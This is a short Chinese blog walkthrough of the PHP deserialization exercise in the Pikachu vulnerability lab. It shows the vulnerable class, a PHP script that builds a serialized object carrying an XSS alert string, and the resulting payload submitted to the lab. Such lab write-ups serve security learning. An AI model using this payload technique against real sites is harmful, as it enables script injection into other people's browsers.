Pikachu漏洞靶场 PHP反序列化

嚯霍嚯

 关注

阅读 72

2022-04-08

PHP反序列化

查看源码,以下为关键代码:

class S{
    var $test = "pikachu";
    function __construct(){
        echo $this->test;
    }
}

首先是一个PHP类,里面有一个变量test;还有构造函数__construct(),它输出本实例的test变量值。

构造payload

<?php
class S{
    var $test = "<script>alert('xss')</script>";
}
$c = new S();
echo(serialize($c));
?>

运行:

得到payload:

O:1:"S":1:{s:4:"test";s:29:"<script>alert('xss')</script>";}

在网站提交准备好的payload,反序列化成功利用:

相关推荐

pikachu靶场PHP反序列化漏洞

sullay 59 0 0

Pikachu-PHP反序列化

书呆鱼 37 0 0

php反序列化漏洞

八怪不姓丑 56 0 0

Apache Shiro 反序列化漏洞靶场

写心之所想 103 0 0

php反序列化漏洞一

猫er聆听没落的旋律 97 0 0

29_反序列化漏洞、反序列化概念、反序列化原理、反序列化漏洞防御、序列化

李雨喵 33 0 0

PHP反序列化漏洞笔记(一):初识序列化

是波波呀 52 0 0

PHP反序列化6(session反序列化)

乱世小白 20 0 0

PHP反序列化

工程与房产肖律师 59 0 0

FastJson反序列化漏洞

驚鴻飛雪 70 0 0

精彩评论(0)

0 0 举报